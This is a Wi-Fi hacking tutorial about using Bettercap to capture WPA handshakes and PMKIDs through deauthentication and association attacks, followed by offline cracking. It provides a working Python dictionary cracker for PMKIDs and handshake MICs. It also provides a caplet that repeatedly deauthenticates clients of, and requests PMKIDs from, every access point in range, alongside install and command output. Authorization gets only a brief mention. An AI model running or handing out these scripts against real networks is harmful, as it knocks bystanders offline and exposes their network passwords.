There are many tools out there for Wi-Fi hacking, but few are as integrated and well-rounded as Bettercap. Thanks to an impressively simple interface that works even over SSH, it's easy to run many of the most powerful Wi-Fi attacks available from anywhere. To capture handshakes from both attended and unattended Wi-Fi networks, we'll use two of Bettercap's Wi-Fi attacks, wifi.deauth and wifi.assoc, to gather the material needed to audit for weak Wi-Fi passwords.
The idea of organizing tools into useful frameworks isn't new, but there are many ways of doing it. Frameworks like Airgeddon include an incredible amount of bleeding-edge Wi-Fi hacking tools but cannot be driven from a single terminal session. That's because Airgeddon opens new terminal windows for the different tools it runs, so if you're communicating with a Raspberry Pi over a plain SSH session, you can forget launching many of its Wi-Fi attacks.
Bettercap allows access to the tools needed to swiftly scout for targets, designate one, and grab a WPA handshake to brute-force. While we won't be working with any WPS recon modules today, our setup will allow you to audit for weak WPA passwords with ease. The way Bettercap is organized allows anyone within proximity of a target to probe for weak WPA passwords from one terminal. Note that the two techniques differ in how noisy they are: a deauthentication attack floods the air with management frames that any wireless IDS will flag, while the PMKID request is a single association attempt that looks much like a normal client joining.
WPA Hacking with Bettercap
Bettercap is described as the Swiss Army knife of wireless hacking. To that end, it has a lot of modules for sniffing networks after you connect to them, as well as other modules looking at Bluetooth devices. The most straightforward use of Bettercap is to use the scanning and recon modules to identify nearby targets to direct attacks at, then attempt to identify networks with weak passwords after capturing the necessary information.
Our targets, in this case, will be two kinds of networks: attended and unattended. Attended networks are easier to attack, and a larger number of tools will work against them. With an attended network, there are people actively using it to download files, watch Netflix, or browse the internet. We can count on there being devices to kick off the network; when they reconnect, they perform the WPA 4-way handshake that gives us the information we need to try to crack the password.
Unattended networks are trickier to target. Because they have no connected clients to disconnect, these networks were typically unable to yield the information needed to audit for a weak password. With the PMKID approach to cracking WPA passwords, that's no longer the case: the attacker sends an association request itself, and the access point's first EAPOL message can contain a PMKID derived from the same pre-shared key. The technique is integrated as one of the Wi-Fi hacking commands (wifi.assoc) and makes unattended networks just as easy to attack. The caveat is that not every access point includes a PMKID in that message, so some networks will only ever yield a handshake when a client is present.
Brute-Forcing Power Workarounds
Bettercap doesn't directly break the passwords of networks it targets, but it would be impossible to do so without the information Bettercap provides. Once a handshake or PMKID is captured, you'll need an offline cracking tool like Aircrack-ng or Hashcat to try a list of common passwords against what you've captured (Hydra, an online login brute-forcer, is the wrong tool for this job). How quickly it will happen depends on a few factors.
The first is whether the password used to secure the target network is in the password list you're using at all. If it isn't, this attack won't succeed, so it's essential to use lists of real leaked passwords or customized password generators like CUPP. If you don't believe that brute-force attacks are still effective, you'd be surprised to learn that any eight-character password can be brute-forced in a little over two hours. Keep in mind, though, that this figure is for fast hashes such as NTLM; WPA runs PBKDF2 with 4096 rounds of HMAC-SHA1 per guess, which slows each attempt by several orders of magnitude and is exactly why a good wordlist matters more than raw speed.
Another workaround for the limited cracking power of a device like a Raspberry Pi for Wi-Fi hacking is to upload the WPA handshake to a cracking service or network. Many hackers use networks that distribute the cracking load among volunteer "worker" computers, which lets the group crack WPA handshakes that less powerful devices can gather.
If you were to run Bettercap on a Raspberry Pi and then upload the captured handshakes to a distributed WPA cracker, you could recover a password that appears in the wordlist within minutes. Alternatively, you could set this up yourself if you have a computer with a powerful processor and GPU.
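The cracking step described above, shown end to end for both cases the article covers: the PMKID obtained from an unattended network and the message-2 MIC of a 4-way handshake from an attended one. This is an added example, not code from the article or from Bettercap. The SSID, MAC addresses, nonces, wordlist and the "captured" values are all constructed here so the script runs offline and recovers a known passphrase; a real run would take these values from the pcap that wifi.handshakes.file points at.

```python
"""Dictionary attack on a WPA2 PMKID and on a 4-way handshake MIC.

Added example (not code from the original article or from Bettercap).
The SSID, MAC addresses, nonces, wordlist and the "captured" frames are all
constructed here so that the script runs offline and recovers a known answer.
"""
import hashlib
import hmac
from typing import Iterable, Optional

EAPOL_MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).

    The 4096 rounds are the whole cost of a guess, which is why WPA cracking is
    orders of magnitude slower than cracking a bare hash such as NTLM."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || station MAC).

    This is the 16-byte value wifi.assoc pulls out of the first EAPOL message an
    AP sends back, so no client has to be present."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes of SHA-1 output, truncated to 64 bytes
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1(KCK, frame with MIC zeroed), first 16 bytes."""
    zeroed = eapol_frame[:EAPOL_MIC_OFFSET] + b"\x00" * 16 + eapol_frame[EAPOL_MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_pmkid(target: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes,
                wordlist: Iterable[str]) -> Optional[str]:
    """Unattended-network case: one PBKDF2 + one HMAC per candidate."""
    for word in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(word, ssid), ap_mac, sta_mac), target):
            return word
    return None  # passphrase not in the wordlist: the attack simply fails


def crack_handshake(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
                    eapol_msg2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Attended-network case: recompute the MIC of message 2 under each candidate.

    The KCK is the first 16 bytes of the PTK; a matching MIC proves the guess."""
    captured_mic = eapol_msg2[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16]
    for word in wordlist:
        ptk = ptk_from_pmk(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_msg2), captured_mic):
            return word
    return None


# --- constructed "capture" (all values made up for this example) --------------
SSID = "ExampleNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))          # real nonces are random; fixed here for reproducibility
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "letmein", "correcthorse", "Summer2019!", "hunter22"]
TRUE_PASSPHRASE = "Summer2019!"    # the secret the "capture" below was made with


def build_eapol_msg2(kck: bytes, snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (RSN descriptor, key info 0x010a, empty key data) with a valid MIC."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 8 + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    mic = eapol_mic(kck, frame)
    return frame[:EAPOL_MIC_OFFSET] + mic + frame[EAPOL_MIC_OFFSET + 16:]


def demo() -> tuple:
    """Return (PMKID result, handshake result, result with a wordlist that lacks the passphrase)."""
    pmk = pmk_from_passphrase(TRUE_PASSPHRASE, SSID)
    captured_pmkid = pmkid(pmk, AP_MAC, STA_MAC)
    msg2 = build_eapol_msg2(ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16], SNONCE)
    return (
        crack_pmkid(captured_pmkid, SSID, AP_MAC, STA_MAC, WORDLIST),
        crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, msg2, WORDLIST),
        crack_pmkid(captured_pmkid, SSID, AP_MAC, STA_MAC, ["qwerty", "12345678"]),
    )


if __name__ == "__main__":
    print(demo())
```

The third result is the failure mode from the text: with a wordlist that does not contain the passphrase, the loop exhausts and returns nothing, no matter how fast the hardware. For real captures you would not reimplement this; point Aircrack-ng at the pcap (aircrack-ng -w wordlist.txt capture.pcap) or convert it with hcxpcapngtool and run Hashcat in mode 22000, which handles both PMKIDs and EAPOL handshakes on the GPU.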
What You'll Need
To follow this guide, you'll need a wireless network card you can put into wireless monitor mode. Your computer may have an internal card that supports wireless monitor mode, but you'll need to be running Linux to work with it. You can refer to our other guide to find out if your existing card will work.
You can follow our guide today with Kali Linux on your laptop, a Raspberry Pi running Kali Linux, or even Ubuntu with some additional installation. For best results, you should use Kali Linux, because Bettercap comes preinstalled.
Step 1: Install Bettercap
If you have Kali Linux installed, you can find it in the "Sniffing & Spoofing" folder in the "Applications" menu or from a search.
If you don't have Bettercap, the documentation for the project is on the Bettercap website. If you're running Kali, you can run apt install bettercap to add it, as seen below. Then, you can locate the tool as seen above.
~# apt install bettercap
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
liblinear3
Use 'apt autoremove' to remove it.
The following additional packages will be installed:
bettercap-caplets
Suggested packages:
bettercap-ui
The following NEW packages will be installed:
bettercap bettercap-caplets
0 upgraded, 2 newly installed, 0 to remove and 1854 not upgraded.
Need to get 6,931 kB of archives.
After this operation, 25.8 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 bettercap amd64 2.26.1-0kali1 [6,821 kB]
Get:2 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 bettercap-caplets all 0+git20191009-0kali1 [110 kB]
Fetched 6,931 kB in 3s (2,332 kB/s)
Selecting previously unselected package bettercap.
(Reading database ... 417705 files and directories currently installed.)
Preparing to unpack .../bettercap_2.26.1-0kali1_amd64.deb ...
Unpacking bettercap (2.26.1-0kali1) ...
Selecting previously unselected package bettercap-caplets.
Preparing to unpack .../bettercap-caplets_0+git20191009-0kali1_all.deb ...
Unpacking bettercap-caplets (0+git20191009-0kali1) ...
Setting up bettercap-caplets (0+git20191009-0kali1) ...
Setting up bettercap (2.26.1-0kali1) ...
bettercap.service is a disabled or a static unit, not starting it.
If you're not running Kali, you'll need to refer to Bettercap's more complicated setup. If you're on a Mac, you can do network recon, but the Wi-Fi modules I'm writing about won't work. Still, you can check out other features by installing it with Homebrew, using the command brew install bettercap.
Step 2: Launch Bettercap
When ready, click on Bettercap's icon to launch it. You should see the following help menu in a terminal window, although the tool will not automatically start.
Usage of bettercap:
-autostart string
Comma separated list of modules to auto start. (default "events.stream")
-caplet string
Read commands from this file and execute them in the interactive session.
-cpu-profile file
Write cpu profile file.
-debug
Print debug messages.
-env-file string
Load environment variables from this file if found, set to empty to disable environment persistence.
-eval string
Run one or more commands separated by ; in the interactive session, used to set variables via command line.
-gateway-override string
Use the provided IP address instead of the default gateway. If not specified or invalid, the default gateway will be used.
-iface string
Network interface to bind to, if empty the default interface will be auto selected.
-mem-profile file
Write memory profile to file.
-no-colors
Disable output color effects.
-no-history
Disable interactive session history file.
-silent
Suppress all logs which are not errors.
-version
Print the version and exit.
Here, we can see the arguments we can start Bettercap with. One of the most useful of these is -iface, which allows us to define which interface to work with. If we have an external wireless network adapter, we'll need to define it with that.
Step 3: Connect Your Network Adapter & Start
Now, we'll need to put our card into monitor mode. If we're connected to a Wi-Fi network already, Bettercap will start sniffing that network instead, so monitor mode always comes first.
Locate your card with ifconfig or ip a to find the name of your network adapter. It should be something like wlan0 for your internal adapter and wlan1 for your USB network adapter.
Take the adapter that's monitor mode-compatible, and switch it to monitor mode by opening a terminal window and typing airmon-ng start wlan1, with wlan1 substituted with the name of your network adapter. If airmon-ng warns about processes that could cause trouble, as it does below, run airmon-ng check kill first; be aware that this stops NetworkManager and wpa_supplicant, so any Wi-Fi connection the machine itself is using will drop.
~# airmon-ng start wlan1
Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
559 NetworkManager
621 wpa_supplicant
14785 dhclient
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
phy3 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy3]wlan1 on [phy3]wlan1mon)
(mac80211 station mode vif disabled for [phy3]wlan1)
You can then type ifconfig or ip a again to verify it started; the monitor interface gets a new name, here wlan1mon.
After making sure that your wireless card is in monitor mode, you can start Bettercap by typing sudo bettercap -iface wlan1mon in a new terminal window, substituting wlan1mon with your monitor interface's name.
~# sudo bettercap --iface wlan1mon
bettercap v2.24.1 (built for linux amd64 with go1.12.7) [type 'help' for a list of commands]
wlan1 »
Once Bettercap opens, type help to see a list of all commands, followed by every module and whether it is running. In the module list, you can see that the wifi module is not started by default.
wlan1 » help
help MODULE : List available commands or show module specific help if no module name is provided.
active : Show information about active modules.
quit : Close the session and exit.
sleep SECONDS : Sleep for the given amount of seconds.
get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
Modules
any.proxy > not running
api.rest > not running
arp.spoof > not running
ble.recon > not running
caplets > not running
dhcp6.spoof > not running
dns.spoof > not running
events.stream > running
gps > not running
http.proxy > not running
http.server > not running
https.proxy > not running
https.server > not running
mac.changer > not running
mysql.server > not running
net.probe > not running
net.recon > running
net.sniff > not running
packet.proxy > not running
syn.scan > not running
tcp.proxy > not running
ticker > not running
update > not running
wifi > not running
wol > not running
Step 4: Scan for Nearby Networks
To get started, let's look at the commands we can issue under the wifi module. We can see this information by typing help wifi into Bettercap.
wlan1 » help wifi
wifi (running): A module to monitor and perform wireless attacks on 802.11.
wifi.recon on : Start 802.11 wireless base stations discovery and channel hopping.
wifi.recon off : Stop 802.11 wireless base stations discovery and channel hopping.
wifi.clear : Clear all access points collected by the WiFi discovery module.
wifi.recon MAC : Set 802.11 base station address to filter for.
wifi.recon clear : Remove the 802.11 base station filter.
wifi.deauth BSSID : Start a 802.11 deauth attack, if an access point BSSID is provided, every client will be deauthenticated, otherwise only the selected client. Use 'all', '*' or a broadcast BSSID (ff:ff:ff:ff:ff:ff) to iterate every access point with at least one client and start a deauth attack for each one.
wifi.assoc BSSID : Send an association request to the selected BSSID in order to receive a RSN PMKID key. Use 'all', '*' or a broadcast BSSID (ff:ff:ff:ff:ff:ff) to iterate for every access point.
wifi.ap : Inject fake management beacons in order to create a rogue access point.
wifi.show.wps BSSID : Show WPS information about a given station (use 'all', '*' or a broadcast BSSID for all).
wifi.show : Show current wireless stations list (default sorting by essid).
wifi.recon.channel : WiFi channels (comma separated) or 'clear' for channel hopping.
Parameters
wifi.ap.bssid : BSSID of the fake access point. (default=<random mac>)
wifi.ap.channel : Channel of the fake access point. (default=1)
wifi.ap.encryption : If true, the fake access point will use WPA2, otherwise it'll result as an open AP. (default=true)
wifi.ap.ssid : SSID of the fake access point. (default=FreeWiFi)
wifi.assoc.open : Send association requests to open networks. (default=false)
wifi.assoc.silent : If true, messages from wifi.assoc will be suppressed. (default=false)
wifi.assoc.skip : Comma separated list of BSSID to skip while sending association requests. (default=)
wifi.deauth.open : Send wifi deauth packets to open networks. (default=true)
wifi.deauth.silent : If true, messages from wifi.deauth will be suppressed. (default=false)
wifi.deauth.skip : Comma separated list of BSSID to skip while sending deauth packets. (default=)
wifi.handshakes.file : File path of the pcap file to save handshakes to. (default=~/bettercap-wifi-handshakes.pcap)
wifi.hop.period : If channel hopping is enabled (empty wifi.recon.channel), this is the time in milliseconds the algorithm will hop on every channel (it'll be doubled if both 2.4 and 5.0 bands are available). (default=250)
wifi.region : Set the WiFi region to this value before activating the interface. (default=BO)
wifi.rssi.min : Minimum WiFi signal strength in dBm. (default=-200)
wifi.show.filter : Defines a regular expression filter for wifi.show (default=)
wifi.show.limit : Defines limit for wifi.show (default=0)
wifi.show.sort : Defines sorting field (rssi, bssid, essid, channel, encryption, clients, seen, sent, rcvd) and direction (asc or desc) for wifi.show (default=rssi asc)
wifi.skip-broken : If true, dot11 packets with an invalid checksum will be skipped. (default=true)
wifi.source.file : If set, the wifi module will read from this pcap file instead of the hardware interface. (default=)
wifi.txpower : Set WiFi transmission power to this value before activating the interface. (default=30)
Here, we can see lots of options! For our purposes, we'll start with Wi-Fi recon. To start it, type wifi.recon on into Bettercap. You'll begin to get a flood of messages as soon as networks start to be detected. If this gets overwhelming, you can type events.stream off to mute the alerts; the discovered networks are still collected, and wifi.show prints the current table whenever you want it. Note that everything captured, including handshakes and PMKIDs, is written to the pcap path in wifi.handshakes.file, so set that before attacking if you want it somewhere other than the default.
wlan1 » wifi.recon on
[23:01:35] [sys.log] [inf] wifi WiFi region set to 'BO'
[23:01:35] [sys.log] [inf] wifi interface wlan1 txpower set to 30
[23:01:35] [sys.log] [inf] wifi started (min rssi: -200 dBm)
wlan1 » [23:01:35] [sys.log] [inf] wifi channel hopper started
wlan1 » [23:01:35] [wifi.ap.new] wifi access point [redacted]
wlan1 » [23:01:35] [wifi.ap.new] wifi access point [redacted]
wlan1 » [23:01:36] [wifi.ap.new] wifi access point [redacted]
wlan1 » [23:01:38] [wifi.client.new] new station [redacted]
wlan1 » [23:01:39] [wifi.ap.new] wifi access point [redacted]
wlan1 » [23:01:42] [wifi.client.new] new station [redacted]
(further wifi.ap.new and wifi.client.new events omitted; the access point and station details were redacted in the original)
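Steps 3 and 4 and the two attacks the article set out to use can be scripted so that the whole capture runs unattended over SSH. The caplet below is an added example, not from the article or from the Bettercap project. Every command and parameter in it comes from the help wifi output above except ticker.period and ticker.commands, which belong to Bettercap's ticker module (listed in the module table but whose help is not shown on this page). It assumes the monitor interface is wlan1mon, that the output path is arbitrary, and that you are authorized to test every network left in range after the RSSI filter.

```text
# wpa-capture.cap (added example caplet; not from the article or the Bettercap project)
# Launch with:  sudo bettercap -iface wlan1mon -caplet wpa-capture.cap
# Assumes wlan1mon is already in monitor mode; path and timings are arbitrary choices.

# where captured EAPOL frames and PMKIDs are written
set wifi.handshakes.file /root/wpa-handshakes.pcap
# ignore access points too far away to attack reliably
set wifi.rssi.min -75
# attended networks (those with clients) at the top of the table
set wifi.show.sort clients desc
# out-of-scope access points whose clients must never be kicked (fill in before use)
# set wifi.deauth.skip aa:bb:cc:dd:ee:ff,11:22:33:44:55:66

wifi.recon on
# let the channel hopper populate the table before attacking anything
sleep 20

# The ticker re-runs its command list every ticker.period seconds.
# wifi.assoc all asks every AP for a PMKID (works with no clients present);
# wifi.deauth all kicks clients so they reconnect and produce a 4-way handshake.
# Drop wifi.deauth all from the list if you want the quieter PMKID-only run.
set ticker.period 60
set ticker.commands "clear; wifi.show; wifi.assoc all; wifi.deauth all"
ticker on
```

When a handshake or PMKID is captured, the wifi module logs it and appends it to the pcap, so after a run you only need to copy /root/wpa-handshakes.pcap off the Pi to a machine with a GPU. Restrict the scope with wifi.recon BSSID (the filter command in the help above) if only one network is in scope, rather than relying on the skip list alone.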